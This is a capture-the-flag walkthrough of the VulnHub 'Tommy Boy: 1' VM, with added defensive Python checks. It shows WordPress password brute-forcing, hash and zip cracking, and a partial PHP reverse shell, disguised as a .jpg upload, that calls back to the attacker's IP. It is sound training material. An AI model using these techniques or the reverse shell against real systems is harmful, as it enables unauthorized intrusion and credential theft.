Tommy Boy: 1 Walkthrough

Today I finally completed the Tommy Boy: 1 VM created by Brian Johnson that was on VulnHub. 

This was one of my favorite VMs, seeing that it was based on the movie Tommy Boy. I can honestly say it's been a long time since I've seen this movie, but after this VM, it looks like I'll need to set some time aside in the near future to re-watch this classic Chris Farley and David Spade movie.

The objective of this VM was to "restore a backup copy of the homepage to Callahan Auto's server. However, to consider the box fully pwned, you'll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message."

Sounds simple enough. Let's see what it took to pwn this box!


Per my usual strategy, I kick off an nmap scan against the entire subnet that is on my VirtualBox interface:


root@localhost:~/VM/tommyboy# nmap 192.168.56.0/24

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 16:59 CDT
Nmap scan report for 192.168.56.100
Host is up (0.000057s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:E1:F0:DE (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.101
Host is up (0.00047s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8008/tcp open  http
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.1
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
111/tcp open  rpcbind

Nmap done: 256 IP addresses (3 hosts up) scanned in 7.79 seconds
root@localhost:~/VM/tommyboy#

Looks like 192.168.56.101 is the target machine! I see right away that there are 3 open ports, but let's make sure there's nothing else hidden. I run nmap again, this time against all ports:


root@localhost:~/VM/tommyboy# nmap -p- 192.168.56.101

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 17:01 CDT
Nmap scan report for 192.168.56.101
Host is up (0.00097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8008/tcp  open  http
65534/tcp open  unknown
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds
root@localhost:~/VM/tommyboy# 

Ah-ha! Sneaky sneaky. It appears that another port has been unveiled: 65534. I make a note of this for future research. I would still like more information about this host, so I run nmap again against these 4 ports and add a few more switches:


root@localhost:~/VM/tommyboy# nmap -p22,80,8008,65534 -sV -A 192.168.56.101

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 17:03 CDT
Nmap scan report for 192.168.56.101
Host is up (0.00021s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
| /6packsofb...soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
65534/tcp open  ftp     ProFTPD
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.03 seconds
root@localhost:~/VM/tommyboy# 

Okay, great. Looks like we have something to work with now. Right away, I see "flag-numero-uno.txt" listed as an entry in robots.txt. I grab this flag first and take note of the other headers and directories listed on ports 80 and 8008:


Flag 1 captured! I keep note of the Flag data:


Flag1 data: B34rcl4ws

Great! Flag 1 is down. Let's keep looking around.

After more enumeration, I open up the source of the homepage. As suspected, there are some comments between Nick and Richard:


<!--Comment from Nick: backup copy is in Big Tom's home folder--> 
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password--> 
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time--> 
<!--Comment from Richard: please, I'll ask nicely--> 
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog--> 
<!--Comment from Richard: Deal. Where's the blog again?--> 
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> 
<!--Comment from Richard: Ah! How could I forget? Thanks--> 

Awesome! I check out the video and see that we're being pointed to prehistoric forest.

I navigate to the page and I'm presented with the Callahan Employee Blog:


I start reading some of the blog posts and find the second flag! It's in a comment by Michelle Michelle on the "Announcing the Callahan internal company blog!" post:


I navigate to the following URL and pick up the second flag:
http://192.168.56.101/prehistoricforest/thisisthesecondflagyayyou.txt


Sweet! Flag 2 has been found. I add this to my list:


Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky

With the second flag under my belt, there still is a lot of work to do. My next step is to enumerate more on this WordPress site. I use wpscan to collect a list of users:


root@localhost:~/VM/tommyboy# wpscan --url http://192.168.56.101/prehistoricforest/ --enumerate u


Wonderful! We have 4 usernames to work with. Let's see if we can get lucky and brute-force some of these passwords.

I tried all 4 usernames and finally got a password to crack for the username "tom":


root@localhost:~/VM/tommyboy# wpscan --url http://192.168.56.101/prehistoricforest/ --wordlist ~/tools/rockyou.txt --username tom


After running wpscan, we were able to recover the password for the following user:

username: tom
password: tomtom1
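From the defender's side, a wpscan run like the one above leaves an obvious trail in the Apache access log: a burst of POSTs to wp-login.php from one source, answered with 200 for each failed guess and a 302 redirect once a guess works. The detector below is an added example and not part of the original walkthrough; the log lines it runs on are constructed, and the threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format. The sample lines below are constructed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    entry["status"] = int(entry["status"])
    return entry


def find_wp_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: {"attempts": n, "succeeded": bool}} for every source that
    POSTs to wp-login.php at least `threshold` times inside any `window`.
    WordPress answers a failed login with 200 and a successful one with a
    302 redirect, so a 302 among the burst suggests a guessed password."""
    posts = defaultdict(list)  # ip -> [(timestamp, status), ...]
    for line in lines:
        e = parse_line(line)
        if e and e["method"] == "POST" and e["path"].endswith("/wp-login.php"):
            posts[e["ip"]].append((e["ts"], e["status"]))
    flagged = {}
    for ip, events in posts.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = {"attempts": best,
                           "succeeded": any(st == 302 for _, st in events)}
    return flagged


def sample_log():
    """Constructed sample: 12 guesses in 11 seconds from one host, the last one
    succeeding, plus ordinary traffic from another host."""
    base = datetime(2016, 8, 9, 17, 30, 0, tzinfo=timezone.utc)
    ua = "Mozilla/5.0 (constructed scanner UA)"
    lines = []
    for i in range(12):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        status = 302 if i == 11 else 200
        lines.append(f'192.168.56.1 - - [{ts}] "POST /prehistoricforest/wp-login.php HTTP/1.1" {status} 3456 "-" "{ua}"')
    ts = (base + timedelta(minutes=5)).strftime(TS_FMT)
    lines.append(f'192.168.56.50 - - [{ts}] "GET /prehistoricforest/ HTTP/1.1" 200 9812 "-" "Mozilla/5.0"')
    lines.append(f'192.168.56.50 - - [{ts}] "POST /prehistoricforest/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, info in find_wp_bruteforce(sample_log()).items():
        print(f"{ip}: {info['attempts']} login attempts within 60s, success seen: {info['succeeded']}")
```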

Let's try logging in with our newly found username and password:


And we're in! Time to start navigating around.

Now, I was able to find some great information while logged in as the admin on WordPress; however, most of the data collected will be used later in this VM.

I realize that I need to access this password-protected post if I want to go any further. Looking back at the conversation between Richard and Tom Jr. under the post "Son of A!", Richard tells Tom Jr. to look at the picture in the /richard directory to jog his memory.

Seeing that this is a photo, I decide that there may be some steganography involved. So, I download the picture and run exiftool against it.


root@localhost:~/VM/tommyboy# exiftool shockedrichard.jpg 
ExifTool Version Number         : 10.15
File Name                       : 

[...snippet...]

Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     :  

[...snippet...]

Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6
root@localhost:~/VM/tommyboy# 

Well, what have we here? I see a User Comment with the following string:

ce154b5a8e59c89732bc25d6a2e6b90b

This looks like an MD5 hash to me. So I take it over to HashKiller and run the hash through. It finds a match: the hash was generated from the word "spanky".

By typing in spanky, we are able to view the protected message on the WordPress site.

Looking at the message, Nick was the IT guy and has since left the company. Luckily for us, he left the following information for Richard:


    You guys are all hopeless sheep :-/
    The Callahan Auto Web site is usually pretty stable.  But if for some reason the page is ever down, you guys will probably go out of business.  But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
    IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore.  Warning: Big Tom always forgets his account password.  Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called.  Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

    I left a few other bits of information in my home folder, which the new guy can access via FTP.  Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it.  Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for.  And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again.  Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

    You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password.  I removed my SSH access because I *DON’T* want you calling me in case of an emergency.  But my creds still work on FTP.  Your new fresh fish can connect using my credentials and if he/she has half a brain.

Okay, first things first: I remember that when scanning all ports, there was an unknown service on port 65534. This must be the FTP service that Nick is referencing. So, I wait until the top of the hour, when the FTP service is up and running again.

I access the FTP service using the following "easy to guess" credentials for nickburns:

username: nickburns
password: nickburns

Once logged into the FTP share, I see a file called readme.txt. I download the file to my local host and cat its contents:


root@localhost:~/VM/tommyboy# cat readme.txt
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto.  HAHAHAHAHAAH! SUCKER!  This is the worst job ever!  You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!

Anyway I'm not completely without mercy.  There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years.  Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well.  But guess what?
He always forgets THAT password as well.  Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick
root@localhost:~/VM/tommyboy# 

Okay, so it looks like there's a subfolder called "NickIzL33t" on the server. I figure that's what port 8008 is being used for. I navigate to the following page and I'm presented with this:

 http://192.168.56.101:8008/NickIzL33t


So, this part actually hung me up for a bit. After reading and re-reading what was said, it dawns on me that Nick drops a few hints that are very important: "phone" and "Steve Jobs". There must be some way I can make it look like I'm coming from an Apple/iPhone device. Doing some research, there is a setting within Burp Suite that allows you to change your User-Agent to emulate an iOS device!





As shown above, under Proxy > Options > Match and Replace, there's a way to match the User-Agent header and replace it with one that emulates iOS.


I then navigate to the page again after modifying the settings and I'm presented with a new page:


Nick then mentions that you need to know the EXACT name of the .html file to break into the fortress. So I kick off DirBuster with the following settings:

- User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
- Starting directory: /NickIzL33t
- File extension: html instead of php
- Wordlist: rockyou.txt

With these settings, I find the following page:


http://192.168.56.101:8008/NickIzL33t/fallon1.html


Woot! I see a link to the third flag! I navigate to the following address to capture the flag:

http://192.168.56.101:8008/NickIzL33t/flagtres.txt


THREE OF 5 FLAGS - you're awesome sauce. Flag data: TinyHead

Just like the file says, I've captured 3 of the 5 flags. Here's my current list of flags:



Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead


I'm over halfway there; it's time to keep moving. I read the contents of hint.txt:


Okay, looks like it's time to generate a wordlist that meets all these requirements. I use crunch to accomplish this task, with the following command to generate my password list:


root@localhost:~/VM/tommyboy# crunch 13 13 -t bev,%%@@^1995 -o crunch.txt
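The crunch template above is where the hint sheet does its damage: once the shape of the password is known, a 13-character password mixing uppercase, digits and a symbol collapses to a small keyspace. The helper below is an added example (not from the original walkthrough) that computes the keyspace of a crunch -t template and checks a candidate against it; it assumes crunch's default placeholder classes, including a 33-character default symbol set for ^.

```python
import string
from math import prod

# Character classes behind crunch's -t placeholders. The "^" set is assumed to be
# crunch's default symbol set (33 characters including space); adjust if your build differs.
CRUNCH_CLASSES = {
    ",": string.ascii_uppercase,
    "%": string.digits,
    "@": string.ascii_lowercase,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ",
}
PRINTABLE_ASCII = 95  # alphabet size an attacker without the hint would face per position


def keyspace(template):
    """Number of candidates a crunch -t template expands to (literal positions count once)."""
    return prod(len(CRUNCH_CLASSES[c]) if c in CRUNCH_CLASSES else 1 for c in template)


def matches_template(candidate, template):
    """True if candidate fits the template: literal positions must match exactly,
    placeholder positions must draw from that placeholder's class."""
    if len(candidate) != len(template):
        return False
    for ch, t in zip(candidate, template):
        if t in CRUNCH_CLASSES:
            if ch not in CRUNCH_CLASSES[t]:
                return False
        elif ch != t:
            return False
    return True


def reduction_factor(template):
    """How many times smaller the hinted keyspace is than a blind search of the
    same length over printable ASCII."""
    return PRINTABLE_ASCII ** len(template) / keyspace(template)


if __name__ == "__main__":
    tpl = "bev,%%@@^1995"
    print(f"{tpl}: {keyspace(tpl):,} candidates, "
          f"{reduction_factor(tpl):.2e}x smaller than a blind 13-character search")
```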

Now that my wordlist has been generated, I download Big Tom's encrypted password backup file called "t0msp4ssw0rdz.zip".

I use fcrackzip to brute-force the password-protected zip file:


root@localhost:~/VM/tommyboy# fcrackzip -D -p crunch.txt -u -v t0msp4ssw0rdz.zip 


Awesome! The password used to protect this zip file was:

password: bevH00tr$1995

I unzip the file and read the contents of passwords.txt:





root@localhost:~/VM/tommyboy# cat passwords.txt 
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
root@localhost:~/VM/tommyboy# 

Okay, so the Callahan Auto Server username and password appear to be the credentials needed to SSH into the server. Remembering what I found on the WordPress site earlier after logging in as admin, there was a draft created by Big Tom that said the following:






If my guess is correct, I should be able to add 1938!! to the end of fatguyinalittlecoat to SSH into the server as bigtommysenior:

username: bigtommysenior
password: fatguyinalittlecoat1938!!


Success!

I take a look around in bigtommysenior's home directory and there are 3 files listed:


bigtommysenior@CallahanAutoSrv01:~$ ls -l
total 12
-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior 237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior 630 Jul  7 17:59 LOOT.ZIP
bigtommysenior@CallahanAutoSrv01:~$ 

What have we here? Is that the 4th flag?!


Why yes it is! Now I have 4 out of 5 flags:


Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead
Flag4 data: EditButton

Alright, it's time to find this 5th flag. But first, I need to restore the Callahan web page by copying callahanbak.bak over index.html in /var/www/html:


bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html

I navigate to the home page:


Awesome! The webpage has been restored! However, this is not the end. I still need flag 5!

I take the advice from flag 4 and go to the root of the server and look for /5.txt:


bigtommysenior@CallahanAutoSrv01:~$ cd /
bigtommysenior@CallahanAutoSrv01:/$ ls -lah
total 105K
drwxr-xr-x  25 root     root     4.0K Jul 15 12:35 .
drwxr-xr-x  25 root     root     4.0K Jul 15 12:35 ..
-rwxr-x---   1 www-data www-data  520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root     4.0K Jul  6 08:32 bin
drwxr-xr-x   4 root     root     1.0K Jul 14 13:38 boot
drwxr-xr-x  20 root     root     4.1K Aug 11 13:53 dev

[...snippet...]

bigtommysenior@CallahanAutoSrv01:/$ 

Interesting. I see .5.txt; however, it's owned by www-data and, going by its permissions, only that user or members of the www-data group can actually read its contents. There must be a way to switch to this user, or better yet, maybe there's a way to run a process as www-data and read the file that way...

After some long, hard thinking, I realize that since I'm on the server, it might be a good idea to see if there's anything else hidden within Nick's directory:


bigtommysenior@CallahanAutoSrv01:/$ cd /var/
bigtommysenior@CallahanAutoSrv01:/var$ ls
backups  crash  local  log   opt  snap   thatsg0nnaleaveamark  www
cache    lib    lock   mail  run  spool  tmp
bigtommysenior@CallahanAutoSrv01:/var$ cd thatsg0nnaleaveamark/
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark$ ls
index.html  NickIzL33t
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark$ cd NickIzL33t/
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t$ ls
fallon1.html  flagtres.txt  hint.txt  index.html  P4TCH_4D4MS  t0msp4ssw0rdz.zip
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t$

Ah-ha! There's a directory called P4TCH_4D4MS within NickIzL33t. I navigate to that directory through the browser:

http://192.168.56.101:8008/NickIzL33t/P4TCH_4D4MS/





Interesting. So there's an option to upload an image to the server.

Also, when I navigate to the P4TCH_4D4MS directory on the server, I see that the uploads directory is world-writable!


bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ ls -lah
total 28K
drwxr-xr-x 3 www-data www-data 4.0K Jul 15 12:47 .
drwxr-xr-x 3 www-data www-data 4.0K Jul 17 08:19 ..
-rw-r--r-- 1 root     root     1.6K Jul 15 12:25 backupload.php
-rw-r--r-- 1 root     root      206 Jul 15 12:25 .htaccess
-rw-r--r-- 1 root     root      280 Jul 15 12:03 index.html
-rw-r--r-- 1 root     root     1.6K Jul 15 12:47 upload.php
drwxrwxrwx 2 www-data www-data 4.0K Aug 11 20:07 uploads
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ 

I decide that if I want to read the 5th flag as www-data, I'll need to upload a reverse shell to the server and catch a shell running as www-data. To do this, I first upload my shell as a .jpg, rename the file on the server to .php, then browse to the directory it's located in and catch the shell. Let's see how this was done:


root@localhost:~/VM/tommyboy# cat geoda.php.jpg 
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

[...snippet...]

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.1';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

[...snippet...]

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
 if (!$daemon) {
  print "$string\n";
 }
}

?> 



root@localhost:~/VM/tommyboy# 

As shown above, I have my reverse shell geoda.php.jpg and I upload it to the server.

I then go to the uploads directory on the server and copy the file, saving it as a .php:


bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ cp geoda.php.jpg geoda.php
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls
geoda.php  geoda.php.jpg  index.html
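The two conditions that made this work, a world-writable directory under a served path and a PHP file sitting in it, are cheap to audit for. The walker below is an added example, not part of the original walkthrough or the VM; it builds a constructed copy of the P4TCH_4D4MS layout in a temporary directory and reports both conditions. The set of executed extensions is an assumption modelled on Ubuntu's default Apache PHP handler.

```python
import os
import stat
import tempfile

# Extensions the Apache PHP handler executes (assumed: .php, .phtml, .phar on Ubuntu).
EXEC_EXTS = {".php", ".phtml", ".phar"}


def audit_webroot(root):
    """Walk a served tree and return sorted (finding, relative_path) tuples for
    world-writable directories and for executable scripts inside them.
    A double extension like geoda.php.jpg is not executed by the handler, so
    it is not reported; the geoda.php copy next to it is."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append(("world_writable_dir", rel_dir))
            for name in filenames:
                if os.path.splitext(name)[1].lower() in EXEC_EXTS:
                    findings.append(("script_in_writable_dir", os.path.join(rel_dir, name)))
    return sorted(findings)


def build_fixture():
    """Constructed copy of the layout seen on the VM: an uploads directory with
    mode 777 holding the .jpg-disguised shell and its .php copy. Returns the root."""
    root = tempfile.mkdtemp(prefix="webroot_")
    app = os.path.join(root, "P4TCH_4D4MS")
    uploads = os.path.join(app, "uploads")
    os.makedirs(uploads)
    for name in ("index.html", "upload.php", "backupload.php"):
        open(os.path.join(app, name), "w").close()
    for name in ("index.html", "geoda.php.jpg", "geoda.php"):
        open(os.path.join(uploads, name), "w").close()
    os.chmod(app, 0o755)
    os.chmod(uploads, 0o777)  # the drwxrwxrwx seen in the ls -lah above
    return root


if __name__ == "__main__":
    for finding, path in audit_webroot(build_fixture()):
        print(f"{finding}: {path}")
```

The upload.php and backupload.php in the application directory are not reported because that directory is mode 755; only the writable uploads directory and the script inside it are.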

Now that my reverse shell is in place, I fire up netcat on port 443 and navigate to where my shell is located:

http://192.168.56.101:8008/NickIzL33t/P4TCH_4D4MS/uploads/geoda.php




Yes! It worked. I then navigate to the root directory and cat flag 5:


Now I have all 5 flags! I then "blob it into one big chunk":


Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead
Flag4 data: EditButton
Flag5 data: Buttcrack

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

I then go back to bigtommysenior via SSH and locate the LOOT.ZIP file, unzip it with the newly generated password, and cat the final text file:


bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ cd ~
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak  el-flag-numero-quatro.txt  LOOT.ZIP
bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP 
Archive:  LOOT.ZIP
[LOOT.ZIP] THE-END.txt password: 
  inflating: THE-END.txt             
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt 
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next 
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

</shamelessplugs>

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security
bigtommysenior@CallahanAutoSrv01:~$ 

Whew! Success!

This was an excellent VM. I was able to use a lot of tools that I've either never used before, tools that I've used but didn't know the full capabilities of, or tools I hadn't used in a while and needed to freshen up on.

I'd like to thank Brian Johnson for creating such a wonderful VM and, of course, VulnHub for hosting this for all of us to learn on.